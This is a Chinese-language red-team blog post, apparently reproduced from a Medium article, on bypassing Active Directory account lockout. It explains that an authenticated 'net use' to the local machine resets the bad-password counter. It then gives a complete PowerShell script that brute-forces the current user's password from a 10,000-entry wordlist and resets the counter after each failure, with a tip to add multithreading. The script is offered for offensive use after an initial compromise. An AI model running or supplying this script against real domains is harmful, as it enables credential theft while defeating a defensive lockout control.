BYPASS-AD账户锁定

BYPASS-AD账户锁定🔒

0X00 前言

文章来源于Medium,bypassing-ad-account-lockout,我对此做了复现.

站在红队的角度,我们前期通过钓鱼或者web应用攻击等手段获得了目标权限,可能是一个目标用户的权限,亦或者是普通服务用户的权限,而且这个用户可能在目标环境中可以有很多作用.其中一个环节就是获得目标的密码,获取用户密码的方式虽然有很多,但是条件苛刻的情况下,工具是不太好使的,本文只是另一种方式.

0X01 复现

什么是账户锁定策略?即用户在指定时间内输入错误密码的次数达到了相应的次数(这个次数是自己设置的,即下文中的”账户锁定阈值”),账户锁定策略就会将该用户禁用。该策略可以防止攻击者猜测用户密码,提高用户的安全性。

核心思想就是只要用户经过了身份验证,就可以执行:

net use \\%computername% /u:%username%

这个命令的好处就是可以重置锁定次数.
一般来说,组策略的限制下,次数是有限制的,通过这个是重置密码次数,达到爆破的目的.

貌似默认是无限制的,需要自己设置密码策略.
-w1071

测试,我设置时间短一点.
然后应用到组.
-w1008

有关get-aduser的介绍:get-aduser

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

-w1055

然后我再使用一个命令:

net use //ATTCKWING flowing

-w1062

次数被重置了.
如果提示有存在的共享,del掉即可.
使用top1000的password去破解.
https://github.com/danielmiessler/SecLists

一个demo:

$userVar = Get-ChildItem env:username

$uname = $userVar.Value

$computerVar = Get-ChildItem env:computername

$computerName = $computerVar.Value

$ErrorActionPreference = "Stop”

$hooray = "PasswordNotFound”

$CurrentPath = "C:\Users\Public”

$FileName = "10-million-password-list-top-10000.txt”

$FName= "$CurrentPath\$FileName”

foreach($value in [System.IO.File]::ReadLines($Fname))

{

$passAttempt = ('net use \\' + $computerName + ' "'+ $value +'"' + '/u:' + $uname )

try

{

Write-Output ("trying password " + $value)

$output = Invoke-Expression $passAttempt | Out-Null

$hooray = $value

write-output ("FOUND the user password: " + $value)

$reset = ('net use \\' + $computername + ' /u:' + $uname )

Invoke-Expression $reset | Out-Null

$deleteShare = ('net use /delete \\' + $computername )

Invoke-Expression $deleteShare | Out-Null

break

}

catch

{

$reset = ('net use \\' + $computername + ' /u:' + $uname )

Invoke-Expression $reset | Out-Null

$deleteShare = ('net use /delete \\' + $computername )

Invoke-Expression $deleteShare | Out-Null

}

}

write-host "The Password is: "  $hooray

代码根据自己情况进行修改,可以配上多线程.
-w821

Get It!


   转载规则


《BYPASS-AD账户锁定》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
快速分析APT34/OILRIG LEAK 快速分析APT34/OILRIG LEAK
这里没有哦 import wing
2019-04-19 Wing
下一篇 
RedTeam攻击技巧和安全防御 RedTeam攻击技巧和安全防御
0X00 前言RedTeam的起源是出现在军事领域方面,人们意识到,要做到更好的防守,就需要去攻击自己的防御,才能更好的找到防守的弱点,在国内,进攻方为蓝军,防守方为红军,蓝军我自己习惯称为RedTeam,红蓝对抗的意义在于帮助防守者更全
2019-04-14
  目录